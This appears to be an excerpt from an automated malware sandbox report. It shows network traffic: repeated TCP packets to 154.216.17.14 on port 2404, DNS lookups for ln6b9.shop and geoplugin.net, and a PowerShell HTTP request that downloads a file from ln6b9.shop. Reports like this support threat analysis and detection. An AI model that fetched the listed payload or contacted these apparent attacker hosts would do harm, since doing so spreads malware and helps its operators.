                                                      Oct 14, 2024 11:06:59.141354084 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141361952 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141366005 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141376972 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141396999 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141431093 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141448975 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141453028 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141460896 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141470909 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141483068 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141484022 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141500950 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141530037 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141542912 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141554117 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141566038 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141566992 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141587973 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141665936 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141678095 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141688108 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141693115 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141704082 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141719103 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141722918 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141731024 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141742945 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141755104 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141767979 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141772985 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141778946 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141791105 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141801119 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141802073 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141813040 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141824961 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141829014 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141839027 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141849041 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141849995 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141861916 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141872883 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141885042 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141891956 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141896963 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141908884 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141920090 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141969919 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141977072 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.141980886 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.141992092 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142003059 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142010927 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142014027 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142035961 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142044067 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142060041 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142066956 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142067909 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142070055 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142076969 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142081976 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142086983 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142098904 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142122984 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142153978 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142307997 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142349005 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142349958 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142360926 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142390013 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142391920 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142394066 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142404079 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142431974 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142457008 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142468929 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142488003 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142493963 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142499924 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142510891 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142522097 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142527103 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142533064 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142575026 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142575026 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142615080 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142627954 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142640114 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142649889 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142662048 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142669916 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142679930 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142688990 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142693043 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142704010 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142716885 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142724991 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142731905 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142757893 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142781973 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142793894 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142812967 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142841101 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142924070 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142935038 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142946005 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142956972 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142968893 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142976999 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.142981052 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142993927 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.142997980 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.143004894 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143023014 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.143040895 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143043041 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143047094 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143058062 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143059969 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.143073082 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143083096 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143096924 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.143096924 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.143121004 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143127918 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.143152952 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143165112 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143189907 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.143223047 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143239975 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143244982 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143251896 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143253088 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.143269062 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.143285990 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.143312931 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.158337116 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230361938 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230410099 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230422020 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230475903 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230488062 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230499029 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230504990 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230508089 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230526924 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230547905 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230561972 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230572939 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230572939 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230583906 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230596066 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230596066 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230607986 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230691910 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230739117 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230750084 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230761051 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230772972 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230789900 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230801105 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230809927 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230812073 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230813980 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230815887 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230835915 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230848074 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230858088 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230870962 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230874062 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230881929 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230887890 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230890989 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230899096 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230911016 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230922937 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230925083 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230941057 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230967045 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.230978966 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.230989933 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231000900 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231012106 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231018066 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231023073 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231039047 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231110096 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231129885 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231142044 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231153011 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231163979 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231174946 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231184006 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231189013 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231209993 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231242895 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231268883 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231281042 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231291056 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231302977 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231313944 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231316090 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231326103 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231337070 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231339931 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231348991 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231372118 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231400013 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231426001 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231437922 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231448889 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231458902 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231471062 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231477022 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231481075 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231492996 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231501102 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.231503963 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231514931 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.231523991 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.232043028 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.249320984 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249342918 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249352932 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249366045 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249397993 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.249418974 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.249500036 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249511957 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249522924 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249536991 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249538898 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.249548912 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249562025 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249571085 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.249608994 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.249974966 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.249980927 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250019073 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250030041 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250041962 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250042915 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250052929 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250061035 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250065088 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250077009 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250092030 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250094891 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250118971 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250137091 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250196934 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250209093 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250221014 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250231981 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250242949 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250250101 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250255108 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250267982 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250273943 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250292063 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250480890 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250494957 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250504971 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250515938 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250523090 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250525951 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250539064 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250550032 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250551939 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250560045 CEST240449977154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:06:59.250591040 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:06:59.250626087 CEST499772404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:07:03.901752949 CEST240449976154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:07:03.903223991 CEST499762404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:07:03.908159971 CEST240449976154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:07:34.008652925 CEST240449976154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:07:34.010565996 CEST499762404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:07:34.015875101 CEST240449976154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:08:04.198524952 CEST240449976154.216.17.14192.168.2.10
                                                      Oct 14, 2024 11:08:04.201210022 CEST499762404192.168.2.10154.216.17.14
                                                      Oct 14, 2024 11:08:04.207096100 CEST240449976154.216.17.14192.168.2.10

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 14, 2024 11:06:09.682749987 CEST5150653192.168.2.101.1.1.1
                                                      Oct 14, 2024 11:06:09.698190928 CEST53515061.1.1.1192.168.2.10
                                                      Oct 14, 2024 11:06:57.413954020 CEST5201253192.168.2.101.1.1.1
                                                      Oct 14, 2024 11:06:57.420809031 CEST53520121.1.1.1192.168.2.10

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 14, 2024 11:06:09.682749987 CEST192.168.2.101.1.1.10x7679Standard query (0)ln6b9.shopA (IP address)IN (0x0001)false
                                                      Oct 14, 2024 11:06:57.413954020 CEST192.168.2.101.1.1.10xf8b9Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 14, 2024 11:06:05.036746025 CEST1.1.1.1192.168.2.100xf31dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                      Oct 14, 2024 11:06:05.036746025 CEST1.1.1.1192.168.2.100xf31dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                      Oct 14, 2024 11:06:09.698190928 CEST1.1.1.1192.168.2.100x7679No error (0)ln6b9.shop172.67.128.117A (IP address)IN (0x0001)false
                                                      Oct 14, 2024 11:06:09.698190928 CEST1.1.1.1192.168.2.100x7679No error (0)ln6b9.shop104.21.2.6A (IP address)IN (0x0001)false
                                                      Oct 14, 2024 11:06:57.420809031 CEST1.1.1.1192.168.2.100xf8b9No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • ln6b9.shop
                                                      • geoplugin.net

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.1049716172.67.128.117805936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 14, 2024 11:06:09.709106922 CEST179OUTGET /eOYLpCyF/Paasknnelses.u32 HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: ln6b9.shop
                                                      Connection: Keep-Alive
                                                      Oct 14, 2024 11:06:10.423749924 CEST1236INHTTP/1.1 200 OK
                                                      Date: Mon, 14 Oct 2024 09:06:10 GMT
                                                      Content-Type: application/octet-stream
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ik2pT%2FuvvP3mOK%2BfrzUKFjMZ5Yhb9ONwda32jjcfMgLsiOi%2FXAQMDdWaIxtbNYVl%2BHXVgEaQY4BbnoknLHfJYDC15BzNY8M8t5F%2FgAGvFydH8ZmVcpN8BwhDMIFB"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8d26696d3b3d431a-EWR
                                                      alt-svc: h2=":443"; ma=60
